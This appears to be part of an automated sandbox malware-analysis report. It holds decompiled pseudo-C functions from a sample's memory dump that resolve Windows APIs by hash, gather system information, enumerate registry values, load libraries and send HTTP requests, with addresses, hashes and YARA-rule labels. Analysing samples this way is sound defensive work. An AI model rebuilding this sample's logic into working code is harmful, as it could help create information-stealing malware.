						}
						if(_v4 == 0) {
							L42:
							__ecx =  &_v0;
							__eax = E00429510( &_v0);
							if(_a404 != 0) {
								__ecx =  &_a400;
								__eax = E0042BE30( &_a400, __esi);
							}
							goto L1;
						} else {
							__esp = __esp + 0xfffffff8;
							__edx = 0xc4b8bd35;
							__eax = _v4;
							__edx = E004167C8(_v4, 0xc4b8bd35);
							L29:
							if(__edx == 0) {
								goto L42;
							}
							 *__edi & 0x000000ff = ( *__edi & 0x000000ff) - 1;
							__eax =  *__edx( *__esi, ( *__edi & 0x000000ff) - 1);
							if(__eax == 0) {
								goto L42;
							}
							__eax =  *__eax;
							if(__eax == 0) {
								__esi = 1;
							} else {
								if(__eax == 0x1000) {
									__esi = 2;
								} else {
									if(__eax == 0x2100) {
										__esi = 4;
									} else {
										if(__eax == 0x2000) {
											__esi = 3;
										} else {
											if(__eax == 0x3000) {
												__esi = 5;
											} else {
												if(__eax != 0x4000) {
													__esi = 7;
													__esi =  !=  ? __ebx : 7;
												} else {
													__esi = 6;
												}
											}
										}
									}
								}
							}
							__ecx =  &_v16;
							__eax = E00429510( &_v16);
							if(_a388 != 0) {
								__ecx =  &_a384;
								__eax = E0042BE30( &_a384, __esi);
							}
							L2:
							_t35 =  *0x43b1f0; // 0x2490528
							 *((intOrPtr*)(_t35 + 0x2c)) = _t64;
							_t56 =  *0x43b1f4; // 0x2491340
							if(_t56 == 0xc139578) {
								 *0x43b1f4 = 0;
								L9:
								_push(0xa1310f65);
								_t48 = E00417564(0xa1310f65);
								if(_t48 == 0) {
									if(E00416C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t48 = E00417564(0xa1310f65);
									}
								}
								if(_t48 == 0) {
									goto L14;
								} else {
									_t69 = _t69 + 0xfffffff8;
									_t59 = E004167C8(_t48, 0x4e85f18d);
									goto L12;
								}
							} else {
								if(_t56 == 0) {
									goto L9;
								} else {
									goto L5;
								}
								do {
									L5:
									_t54 = _t47;
									_t45 = _t54;
									while( *((intOrPtr*)(_t45 + _t56 + 8)) != 0x4e85f18d) {
										_t54 = _t54 + 1;
										_t45 = _t45 + 0x18;
										if(_t54 < 0x10) {
											continue;
										}
										goto L8;
									}
									_t59 =  *((intOrPtr*)(_t45 + _t56 + 0x14));
									if(_t59 != 0) {
										L12:
										if(_t59 != 0) {
											GetSystemInfo( &_a344);
										}
										L14:
										_t39 =  *0x43b1f0; // 0x2490528
										 *((short*)(_t39 + 0xe)) = _a372;
										 *((intOrPtr*)(_t39 + 0x10)) = _a356;
										 *((intOrPtr*)(_t39 + 0x14)) = _a360;
										 *((intOrPtr*)(_t39 + 0x18)) = _a364;
										 *((intOrPtr*)(_t39 + 0x1c)) = _a380;
										return _t39;
									} else {
										goto L9;
									}
									L8:
									asm("o16 nop [eax+eax]");
									_t4 = _t56 + 0x180; // 0x2498fa8
									_t56 =  *_t4;
								} while (_t56 != 0);
								goto L9;
							}
						}
					}
					if(__edx == 0) {
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						__ecx = __ebx;
						__eax = __ecx;
						while( *((intOrPtr*)(__eax + __edx + 8)) != 0xc4b8bd35) {
							__ecx = __ecx + 1;
							__eax = __eax + 0x18;
							if(__ecx < 0x10) {
								continue;
							}
							goto L25;
						}
						__edx =  *((intOrPtr*)(__eax + __edx + 0x14));
						if(__edx != 0) {
							goto L29;
						}
						goto L26;
						L25:
						asm("o16 nop [eax+eax]");
						_t20 = __edx + 0x180; // 0x2498fa8
						__edx =  *_t20;
					} while (__edx != 0);
					goto L26;
				}
				L1:
				_t64 = _t47;
				goto L2;
			}

0x0041430f
0x00414313
0x0041444c
0x00414459
0x00414466
0x00414466
0x00414319
0x00414319
0x00414325
0x004144f6
0x0041435a
0x0041435a
0x0041435f
0x00414365
0x0041436c
0x004144c0
0x004144c5
0x004144cc
0x004144d2
0x004144d7
0x004144dd
0x004144dd
0x004144cc
0x00414376
0x00414420
0x00414420
0x00414424
0x00414431
0x00414437
0x0041443e
0x0041443e
0x00000000
0x0041437c
0x0041437c
0x0041437f
0x00414384
0x0041438d
0x0041438f
0x00414391
0x00000000
0x00000000
0x0041439a
0x0041439e
0x004143a2
0x00000000
0x00000000
0x004143a4
0x004143a8
0x004144b6
0x004143ae
0x004143b3
0x004144ac
0x004143b9
0x004143be
0x004144a2
0x004143c4
0x004143c9
0x00414498
0x004143cf
0x004143d4
0x004143f3
0x004143d6
0x004143db
0x004143e4
0x004143ee
0x004143dd
0x004143dd
0x004143dd
0x004143db
0x004143d4
0x004143c9
0x004143be
0x004143b3
0x004143f8
0x004143fc
0x00414409
0x0041440f
0x00414416
0x00414416
0x00414042
0x00414042
0x00414047
0x0041404a
0x00414056
0x004141cf
0x0041408b
0x00414090
0x00414096
0x0041409a
0x004141a6
0x004141b1
0x004141b7
0x004141b7
0x004141a6
0x004140a2
0x00000000
0x004140a4
0x004140ab
0x004140b3
0x00000000
0x004140b3
0x0041405c
0x0041405e
0x00000000
0x00000000
0x00000000
0x00000000
0x00414060
0x00414060
0x00414060
0x00414062
0x00414064
0x00414072
0x00414073
0x00414079
0x00000000
0x00000000
0x00000000
0x00414079
0x004141be
0x004141c4
0x004140b5
0x004140b7
0x004140c1
0x004140c1
0x004140c3
0x004140c3
0x004140eb
0x004140ef
0x004140f2
0x004140f5
0x004140f8
0x00414107
0x004141ca
0x00000000
0x004141ca
0x0041407b
0x0041407b
0x00414081
0x00414081
0x00414087
0x00000000
0x00414060
0x00414056
0x00414376
0x0041432d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041432f
0x0041432f
0x0041432f
0x00414331
0x00414333
0x00414341
0x00414342
0x00414348
0x00000000
0x00000000
0x00000000
0x00414348
0x004144e5
0x004144eb
0x00000000
0x00000000
0x00000000
0x0041434a
0x0041434a
0x00414350
0x00414350
0x00414356
0x00000000
0x0041432f
0x00414040
0x00414040
0x00000000

APIs

GetSystemInfo.KERNEL32(?), ref: 004140C1

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: f8bde89b1bd440ed3b825be24accdb6fc835c0514f10b6f5629ed72f9bb30880
Instruction ID: cd0b781354ceba3079774635ae18e5432e6690a80a9854044f8da52cbf985d9b
Opcode Fuzzy Hash: f8bde89b1bd440ed3b825be24accdb6fc835c0514f10b6f5629ed72f9bb30880
Instruction Fuzzy Hash: CA51DE30B083418BD7289A19D4947EB76A2ABC4304F2A856FD95997396DB3CCCC1C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00433820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00433820(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				long _t52;
				int _t53;
				intOrPtr _t59;
				void* _t67;
				intOrPtr* _t95;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t109;
				intOrPtr* _t110;

				_t110 = _t109 - 0x60;
				_t107 = __ecx;
				_t39 =  *((intOrPtr*)(__ecx + 8));
				if(_t39 == 0 || _t39 == 0xffffffff) {
					_t40 = 1;
				} else {
					_t40 = 0;
				}
				if(_t40 != 0) {
					L26:
					_push(0);
					E00429350( *((intOrPtr*)(_t110 + 0x78)));
					return  *((intOrPtr*)(_t110 + 0x74));
				} else {
					_t43 =  *((intOrPtr*)(_t107 + 0x10));
					if(_t43 == 0 || _t43 == 0xffffffff) {
						_t44 = 1;
					} else {
						_t44 = 0;
					}
					if(_t44 != 0) {
						goto L26;
					} else {
						_t75 = _t107 + 0x28;
						E00427660(_t107 + 0x28, _t110 + 0x3c, 0x439424);
						E004187A0(_t110 + 0x44);
						_t48 = E004115C0(0xd27f045a, 0x336e58dc);
						_t98 = _t48;
						if(_t48 != 0) {
							 *_t110 =  *((intOrPtr*)(_t107 + 0x10));
							 *((intOrPtr*)(_t110 + 0xc)) =  *((intOrPtr*)(_t110 + 0x44));
							_t102 =  *((intOrPtr*)(_t107 + 0x28));
							 *(_t110 + 8) = E00420180( *((intOrPtr*)(_t110 + 0x44)), 0x7fffffff, _t102);
							if(E00429650( *((intOrPtr*)(_t110 + 0x78))) != 0) {
								 *((intOrPtr*)(_t110 + 4)) = E00429640( *((intOrPtr*)(_t110 + 0x7c)), 0);
							} else {
								 *((intOrPtr*)(_t110 + 4)) = 0;
							}
							_t52 = E00429650( *((intOrPtr*)(_t110 + 0x78)));
							_t103 =  !=  ?  *((void*)(_t110 + 0x18)) : _t102;
							_t53 = HttpSendRequestW( *(_t110 + 0x10),  !=  ?  *((void*)(_t110 + 0x18)) : _t102,  *(_t110 + 0x10),  *(_t110 + 8), _t52); // executed
							if(_t53 == 0) {
								_t104 = E00417F00();
								E00427560(_t75, _t98, _t104);
								if(_t104 != 0) {
									goto L12;
								} else {
									goto L17;
								}
							} else {
								E00427560(_t75, _t98, _t103);
								L17:
								 *(_t110 + 0x50) = 4;
								_t95 = E004115C0(0xd27f045a, 0xcedbd48c);
								if(_t95 == 0) {
									_t59 = 0x7f;
									goto L24;
								} else {
									_t105 = _t110 + 0x50;
									_push(0);
									_push(_t105);
									_push(_t110 + 0x4c);
									_push(0x20000013);
									_push( *((intOrPtr*)(_t107 + 0x10)));
									if( *_t95() == 0) {
										_t59 = E00417F00();
										if(_t59 != 0) {
											L24:
											 *_t107 = _t59;
											E00418CA0(_t110 + 0x44);
											goto L25;
										} else {
											goto L19;
										}
									} else {
										L19:
										 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t110 + 0x4c));
										E00418810(_t110 + 0x38, 0x2800);
										 *(_t110 + 0x50) =  *(_t110 + 0x38) >> 1;
										_t67 = E004115C0(0xd27f045a, 0xcedbd48c);
										if(_t67 == 0) {
											 *_t107 = 0x7f;
											E00418CA0(_t110 + 0x34);
											E00418CA0(_t110 + 0x44);
											goto L25;
										} else {
											_push(0);
											_push(_t105);
											_push( *((intOrPtr*)(_t110 + 0x3c)));
											_push(0x14);
											_push( *((intOrPtr*)(_t107 + 0x10)));
											asm("int3");
											return _t67;
										}
									}
								}
							}
						} else {
							_t104 = 0x7f;
							E00427560(_t75, _t98, 0x7f);
							L12:
							 *_t107 = _t104;
							E00418CA0(_t110 + 0x44);
							L25:
							E00420B10(_t110 + 0x3c);
							goto L26;
						}
					}
				}
			}

0x00433824
0x00433827
0x00433829
0x0043382e
0x00433839
0x00433835
0x00433835
0x00433835
0x00433840
0x00433bba
0x00433bba
0x00433bc0
0x00433bd0
0x00433846
0x00433846
0x0043384b
0x00433856
0x00433852
0x00433852
0x00433852
0x0043385d
0x00000000
0x00433863
0x00433863
0x00433872
0x0043387f
0x0043388e
0x00433893
0x00433897
0x004338c2
0x004338c5
0x004338c9
0x004338d1
0x004338e0
0x00433ca0
0x004338e6
0x004338e6
0x004338e6
0x004338f2
0x00433902
0x0043390c
0x00433910
0x00433c7f
0x00433c83
0x00433c8a
0x00000000
0x00433c90
0x00000000
0x00433c90
0x00433916
0x00433918
0x0043391d
0x0043391d
0x00433934
0x00433938
0x00433ba0
0x00000000
0x0043393e
0x0043393e
0x00433946
0x00433948
0x00433949
0x0043394a
0x0043394f
0x00433956
0x00433c68
0x00433c6f
0x00433ba5
0x00433ba5
0x00433bac
0x00000000
0x00433c75
0x00000000
0x00433c75
0x0043395c
0x0043395c
0x00433965
0x0043396c
0x00433977
0x00433985
0x0043398c
0x00433b89
0x00433b90
0x00433b99
0x00000000
0x00433992
0x00433992
0x00433994
0x00433995
0x00433999
0x0043399b
0x0043399e
0x0043399f
0x0043399f
0x0043398c
0x00433956
0x00433938
0x00433899
0x0043389b
0x004338a0
0x004338a5
0x004338a5
0x004338ac
0x00433bb1
0x00433bb5
0x00000000
0x00433bb5
0x00433897
0x0043385d

APIs

HttpSendRequestW.WININET(D27F045A,?,D27F045A,?,00000000,D27F045A,336E58DC,?), ref: 0043390C

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 2edcfa5687fd9950343c27252c809bbf08146e10ea7220119dcf95b7581af2eb
Instruction ID: 0620eb179fd149f77428d3869a7e38fa6261f5fbe9311149f315e43887e92391
Opcode Fuzzy Hash: 2edcfa5687fd9950343c27252c809bbf08146e10ea7220119dcf95b7581af2eb
Instruction Fuzzy Hash: 2051C430608301ABD710AF25CC41B6FBBE4AF84394F50592EF95597391EB38DD45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C580(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				int _v20;
				char _v28;
				int* _v32;
				int* _v36;
				char _v40;
				char _v48;
				char _v303;
				void* __edi;
				void* __esi;
				long _t25;
				signed int _t33;
				char _t45;
				int _t62;
				intOrPtr _t63;
				char* _t64;
				char* _t66;

				_v40 = 0;
				_t62 = 0;
				_v36 = 0;
				_t63 = __ecx;
				_v32 = 0;
				_t64 = _t66;
				while(1) {
					_v20 = 0x105;
					if(E004115C0(0x3ab94787, 0x31fb9d90) == 0) {
						goto L3;
					}
					_t25 = RegEnumValueA( *(_t63 + 4), _t62, _t64,  &_v20, 0, 0, 0, 0); // executed
					if(_t25 == 0) {
						goto L3;
					}
					_t45 = _v40;
					_t26 = 0;
					if(_t45 <= 0) {
						L9:
						E00420930(_a4, _t26, _t26);
						E00427560( &_v48, _t62, _t63);
						return _v4;
					} else {
						_t63 = _t45;
						_t65 = 0;
						_t62 =  &_v28;
						while(1) {
							E00421240(E00427600( &_v40, _t65), _t62);
							_t40 = _v36;
							_t33 = E0042D620(_t40, E00426040(_v36, 0x7fffffff));
							E00420B10(_t62);
							if((_t33 ^ 0x38ba5c7b) == _v0) {
								break;
							}
							_t65 =  &_v303;
							if( &_v303 < _t63) {
								continue;
							} else {
								_t26 = 0;
								goto L9;
							}
							goto L11;
						}
						E00420750(_v0, E00427600( &_v40, _t65));
						E00427560( &_v48, _t62, _t63);
						return _v4;
					}
					L11:
					L3:
					E004237E0( &_v40, _t64, _v40); // executed
					_t62 = _t62 + 1;
				}
			}

0x0042c58e
0x0042c595
0x0042c597
0x0042c59e
0x0042c5a0
0x0042c5a7
0x0042c5aa
0x0042c5aa
0x0042c5c8
0x00000000
0x00000000
0x0042c5db
0x0042c5df
0x00000000
0x00000000
0x0042c5f8
0x0042c5ff
0x0042c603
0x0042c662
0x0042c66b
0x0042c677
0x0042c68d
0x0042c605
0x0042c607
0x0042c609
0x0042c60b
0x0042c612
0x0042c622
0x0042c627
0x0042c63e
0x0042c647
0x0042c659
0x00000000
0x00000000
0x0042c65b
0x0042c65e
0x00000000
0x0042c660
0x0042c660
0x00000000
0x0042c660
0x00000000
0x0042c65e
0x0042c6a7
0x0042c6b3
0x0042c6c9
0x0042c6c9
0x00000000
0x0042c5e1
0x0042c5f0
0x0042c5f5
0x0042c5f5

APIs

RegEnumValueA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,3AB94787,31FB9D90,?,?,3AB94787,31FB9D90), ref: 0042C5DB

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 01ebfef8a0c1f80468f71e38066f3883afd64deade8182b6bec204ccb1de5934
Instruction ID: 12263bf6daf539b0df1ac66f9f8d153c5c9c1a1b2f296702983155f5afa9889e
Opcode Fuzzy Hash: 01ebfef8a0c1f80468f71e38066f3883afd64deade8182b6bec204ccb1de5934
Instruction Fuzzy Hash: 5831E7313082545BC375EB2AEC91AEFB3D8EBD4304F50492EB189C3241EE796D858B65

Uniqueness

Uniqueness Score: -1.00%

Function 0042C405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042C405(intOrPtr __eax, void* __edi, intOrPtr __ebp, void* _a8, int _a12, void* _a16, void* _a20, void** _a28, void** _a32, void** _a36, char _a40, unsigned int _a44, char _a48, void** _a52, void* _a64, void* _a68) {
				unsigned int _v0;
				void* _v4;
				unsigned int _v8;
				void* _v20;
				void* _v28;
				void* _t41;
				intOrPtr* _t42;
				void** _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;

				_t51 = __ebp;
				_t49 = __eax;
				if(__eax != 0) {
					_t42 = _a16;
					goto L1;
				} else {
					do {
						__edx =  &_a48;
						__ecx =  &_a40;
						__eax = E0041A0D0( &_a40,  &_a48);
						__edx = _a44;
						__ecx =  &_a52;
						__eax = E004183B0( &_a52);
						__esi = _a52;
						__ecx = __esi;
						__edx = 0x7fffffff;
						__eax = E00426040(__esi, 0x7fffffff);
						__ecx = __esi;
						__edx = __eax;
						__esi = __eax;
						__ecx =  &_a52;
						__eax = E00420B10( &_a52);
						if(__esi != __edi) {
							__ecx =  &_a48;
							__eax = E00418CA0( &_a48);
							__ebx = __ebx + 1;
							goto L12;
						} else {
							__edi = _a36;
							__ecx =  &_a48;
							__esi =  *(__ecx - 0x10);
							__eax = E00418CA0(__ecx);
							if(__edi != 0) {
								__ecx =  *(__esp + 0x1c);
								__eax = E004196D0( *(__esp + 0x1c), 0x5c);
							}
							__ecx =  *(__esp + 0x20);
							__eax = E00420220( *(__esp + 0x20), _a40, 0);
							_a12 = 0;
							__eax = E004115C0(0x3ab94787, 0xd5493f9);
							__edx = __eax;
							if(__eax == 0) {
								__edx = 0;
							} else {
								__eax =  &_a20;
								__ecx =  *(__eax - 0xc);
								__ecx =  ==  ?  *((void*)(__eax - 0x10)) :  *(__eax - 0xc);
								__ebx = __eax[1];
								__eax = RegOpenKeyExW( *(__esp + 0x68),  *(__eax[1]), 0, __ecx, __eax); // executed
								__edx = __eax;
							}
							__ebx = _a20;
							if(__ebx == 0 || __ebx == 0xffffffff) {
								L34:
								__ebx = _a16;
								__esi = __edx;
								L1:
								if( *((char*)(_t42 + 8)) == 0) {
									L9:
									 *((intOrPtr*)(_t42 + 4)) = _t51;
									 *((char*)(_t42 + 8)) = 1;
									E00418CA0( &_a40);
									 *_t42 = _t49;
									return _t49;
								} else {
									_t48 =  *((intOrPtr*)(_t42 + 4));
									if(_t48 == 0 || _t48 == 0xffffffff) {
										_t45 = 1;
									} else {
										_t45 = 0;
									}
									if(_t45 != 0) {
										goto L9;
									} else {
										_t41 = E004115C0(0x3ab94787, 0x91935d4e);
										if(_t41 == 0) {
											goto L9;
										} else {
											_push(_t48);
											asm("int3");
											return _t41;
										}
									}
								}
							} else {
								if(__esi == 0) {
									L30:
									__edi =  &(__edi[0]);
									__ebp = __ebx;
									if(__edi < _a28) {
										__esi = 1;
										__eax = __edi * 4;
										__ecx =  *(__esp + 0x58);
										__eax = E00429640( *(__esp + 0x58), __edi * 4);
										__eax =  *__eax;
										__ebx = 0;
										__eax = __eax ^ 0x38ba5c7b;
										_a32 = __edi;
										__edi = __eax;
										_a28 = 1;
										goto L12;
									} else {
										goto L34;
									}
								} else {
									if(__ebp == 0 || __ebp == 0xffffffff) {
										__eax = 1;
									} else {
										__eax = 0;
									}
									if(__eax != 0) {
										goto L30;
									} else {
										_v0 = __edx;
										__eax = E004115C0(0x3ab94787, 0x91935d4e);
										__edx = _v8;
										if(__eax == 0) {
											goto L30;
										} else {
											_push(__ebp);
											_v0 = __edx;
											asm("int3");
											return __eax;
										}
									}
								}
							}
						}
						goto L35;
						L12:
						__eax = E004115C0(0x3ab94787, 0xf561ae8b);
					} while (__eax == 0);
					__edx = _a44;
					__edx = _a44 >> 1;
					_push(_a44 >> 1);
					_push(_a40);
					_push(__ebx);
					_push(__ebp);
					asm("int3");
					return __eax;
				}
				L35:
			}

0x0042c405
0x0042c405
0x0042c409
0x0042c52e
0x00000000
0x0042c40f
0x0042c40f
0x0042c40f
0x0042c414
0x0042c418
0x0042c41d
0x0042c421
0x0042c425
0x0042c42a
0x0042c42e
0x0042c430
0x0042c435
0x0042c43a
0x0042c43c
0x0042c443
0x0042c445
0x0042c449
0x0042c450
0x0042c51f
0x0042c523
0x0042c528
0x00000000
0x0042c456
0x0042c456
0x0042c45a
0x0042c45e
0x0042c461
0x0042c468
0x0042c46c
0x0042c470
0x0042c470
0x0042c47b
0x0042c47f
0x0042c484
0x0042c496
0x0042c49b
0x0042c49f
0x0042c4c3
0x0042c4a1
0x0042c4a5
0x0042c4a9
0x0042c4ac
0x0042c4b4
0x0042c4bd
0x0042c4bf
0x0042c4bf
0x0042c4c5
0x0042c4cb
0x0042c537
0x0042c537
0x0042c53b
0x0042c337
0x0042c33b
0x0042c36c
0x0042c36c
0x0042c373
0x0042c377
0x0042c37c
0x0042c387
0x0042c33d
0x0042c33d
0x0042c342
0x0042c34d
0x0042c349
0x0042c349
0x0042c349
0x0042c354
0x00000000
0x0042c356
0x0042c360
0x0042c367
0x00000000
0x0042c369
0x0042c369
0x0042c36a
0x0042c36b
0x0042c36b
0x0042c367
0x0042c354
0x0042c4d2
0x0042c4d4
0x0042c510
0x0042c510
0x0042c511
0x0042c517
0x0042c3ba
0x0042c3bf
0x0042c3c7
0x0042c3cb
0x0042c3d0
0x0042c3d2
0x0042c3d4
0x0042c3d9
0x0042c3dd
0x0042c3df
0x00000000
0x0042c51d
0x00000000
0x0042c51d
0x0042c4d6
0x0042c4d8
0x0042c4e3
0x0042c4df
0x0042c4df
0x0042c4df
0x0042c4ea
0x00000000
0x0042c4ec
0x0042c4f6
0x0042c4fa
0x0042c4ff
0x0042c504
0x00000000
0x0042c506
0x0042c506
0x0042c507
0x0042c50b
0x0042c50c
0x0042c50c
0x0042c504
0x0042c4ea
0x0042c4d4
0x0042c4cb
0x00000000
0x0042c3e3
0x0042c3ed
0x0042c3f2
0x0042c3f6
0x0042c3fa
0x0042c3fc
0x0042c3fd
0x0042c401
0x0042c402
0x0042c403
0x0042c404
0x0042c404
0x00000000

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000,3AB94787,0D5493F9,?,00000000), ref: 0042C4BD

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 50d361be279e98badc6c01dc055aa46b6c9348fd2954cb42997eeec2646f850a
Instruction ID: deb7eb2774065cb34e49b63c54aec742d13fb7c2118c33020015a96df204d14e
Opcode Fuzzy Hash: 50d361be279e98badc6c01dc055aa46b6c9348fd2954cb42997eeec2646f850a
Instruction Fuzzy Hash: AA21A231704321ABC714EF20D8D0A2FB3E5AFC4758F944A1EF95567291EE38EC418B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040543B, Relevance: 1.6, APIs: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040543B(void* __eax, void* __ebx, void* __edi) {
				signed int _t133;
				void* _t136;
				signed int _t144;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr* _t177;
				void* _t192;
				void* _t202;
				intOrPtr _t205;
				signed int _t215;
				signed int _t219;
				void* _t234;
				intOrPtr* _t235;
				signed int _t238;
				unsigned int _t242;
				intOrPtr _t245;
				signed short* _t246;
				signed int _t249;
				void* _t267;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t328;
				intOrPtr* _t336;
				signed int _t351;
				signed int _t353;
				signed int _t356;
				intOrPtr* _t388;
				signed int _t404;
				void* _t409;
				signed int _t410;
				intOrPtr* _t413;
				void* _t416;
				intOrPtr* _t419;

				_t403 = __edi;
				_t276 = __ebx + 0x43;
				 *0x43b1d0 = 0;
				_t413 = E00413930(_t276, 0, __edi, _t407);
				if( *_t413 < 0x10) {
					E00405150();
				}
				E00406020(_t276);
				E00418810(_t419 + 0x114, 0x200);
				_t388 = E004115C0(0xa1310f65, 0xc4d11e8a);
				if(_t388 != 0) {
					 *_t388(0,  *(_t419 + 0x114),  *(_t419 + 0x114) >> 1);
				}
				E00412580(_t419 + 0x118, _t403, _t407);
				if(E00419C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0x118))) == 0) {
					E00412780(_t419 + 0xe4, _t403, _t407);
					_t133 = E00419C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0xe4)));
					__eflags = _t133;
					if(_t133 == 0) {
						E00412580(_t419 + 0xb4, _t403, _t407);
						_t407 = _t419 + 0x98;
						E0041D980(_t419 + 0xbc, _t419 + 0x98, 0x5c);
						_t136 = E00427600(_t419 + 0x98, 2);
						E0040AC00(_t419 + 0xbc, 6);
						E00418CC0(_t136,  *((intOrPtr*)(_t419 + 0xbc)));
						E00418CA0(_t419 + 0xbc);
						E004289F0(_t407, _t419 + 0x124, 0x5c);
						E00428910(_t407, _t403, _t407);
						E00418CA0(_t419 + 0xb4);
						_t144 = E00419C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0x120)));
						__eflags = _t144;
						_t23 = _t144 > 0;
						__eflags = _t23;
						_t279 = 0 | _t23;
						E00418CA0(_t419 + 0x120);
					} else {
						_t279 = 1;
					}
					E00418CA0(_t419 + 0xe4);
					E00418CA0(_t419 + 0x118);
					__eflags = _t279;
					if(_t279 == 0) {
						_t280 = 0;
						__eflags = 0;
					} else {
						goto L11;
					}
				} else {
					E00418CA0(_t419 + 0x118);
					L11:
					_t280 = 1;
				}
				E0040AC00(_t419 + 0x120, 2);
				E0041D980(_t419 + 0x128, _t419 + 0x130, 0x7e);
				E00418CA0(_t419 + 0x120);
				if( *(_t419 + 0x130) > 0) {
					 *_t419 = _t413;
					_t404 = _t419 + 0x130;
					L15:
					while(1) {
						L15:
						while(1) {
							L15:
							if(E004115C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E00427600(_t404, _t407))); // executed
							}
							_t267 =  *(_t419 + 0x130);
							while(1) {
								_t407 = 1;
								if(1 >= _t267) {
									break;
								}
								if(1 != 4) {
									goto L15;
								} else {
									_t391 =  *0x43b02a & 0x000000ff;
									if(( *0x43b02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L23;
							}
							_t413 =  *_t419;
							goto L23;
						}
					}
				}
				L23:
				__eflags =  *((intOrPtr*)(_t413 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t413 + 0x2c)) != 2) {
					__eflags =  *0x43b028 & 0x000000ff;
					if(( *0x43b028 & 0x000000ff) == 0) {
						__eflags =  *0x43b265 & 0x000000ff;
						if(( *0x43b265 & 0x000000ff) == 0) {
							__eflags = E0043B1CC - 1;
							if(E0043B1CC != 1) {
								_t245 =  *0x43b1d0; // 0x7beaf0
								_t38 = _t245 + 4; // 0x0
								_t246 =  *_t38;
								_t391 =  *_t246 & 0x0000ffff;
								__eflags = ( *_t246 & 0x0000ffff) - 0x2d;
								if(( *_t246 & 0x0000ffff) != 0x2d) {
									E00418AB0(_t419 + 0xcc, _t246, 0);
									_push(0x80);
									_push(0);
									E0042A4E0(_t419 + 0x68, __eflags,  *((intOrPtr*)(_t419 + 0xd0)), 1);
									_t249 = E0042BEA0(_t419 + 0x64, _t391, _t407);
									__eflags = _t249;
									if(_t249 == 0) {
										__eflags =  *((char*)(_t419 + 0x68));
										if( *((char*)(_t419 + 0x68)) != 0) {
											E0042BE30(_t419 + 0x64, _t407);
										}
										E00418CA0(_t419 + 0x58);
										_t410 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E0042A730(_t419 + 0xc4, _t391);
											if(__eflags == 0) {
												break;
											}
											E004122A0(0x64, _t391);
											_t410 = _t410 + 1;
											__eflags = _t410 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t407 = _t419 + 0xcc;
										do {
											E0041AE80(_t419 + 0xcc, __eflags, _t407, 0x5c);
											E00418CC0(_t419 + 0xc8,  *(_t419 + 0xcc));
											E00418CA0(_t407);
											__eflags = E0042A730(_t419 + 0xc4, _t391);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t419 + 0x68));
										if( *((char*)(_t419 + 0x68)) != 0) {
											E0042BE30(_t419 + 0x64, _t407);
										}
										E00418CA0(_t419 + 0x58);
									}
									E00418CA0(_t419 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x43b02a & 0x000000ff) - 2;
					if(( *0x43b02a & 0x000000ff) == 2) {
						L52:
						_t154 =  *0x43b1ad; // 0x2491f30
						__eflags = _t154;
						if(_t154 == 0) {
							L54:
							_t155 =  *0x43b1ad; // 0x2491f30
							__eflags = _t155;
							if(_t155 == 0) {
								_push(0x10);
								_t156 = E00411030();
								_t419 = _t419 + 4;
								__eflags = _t156;
								if(_t156 != 0) {
									_push(0);
									_t157 = E00429350(_t156);
								} else {
									_t157 = 0;
								}
								 *0x43b1ad = _t157;
							}
							_t407 =  *0x43b1ad; // 0x2491f30
							__eflags = ( *0x43b02a & 0x000000ff) - 1;
							if(( *0x43b02a & 0x000000ff) == 1) {
								_t391 = 0x18f8c844;
								_t404 = _t419 + 0x28;
								E00406AD0(_t280, _t404, 0x18f8c844, _t404, _t407, 1, 0); // executed
								_push(_t404);
								E00429520(_t407);
								E00429510(_t404);
							} else {
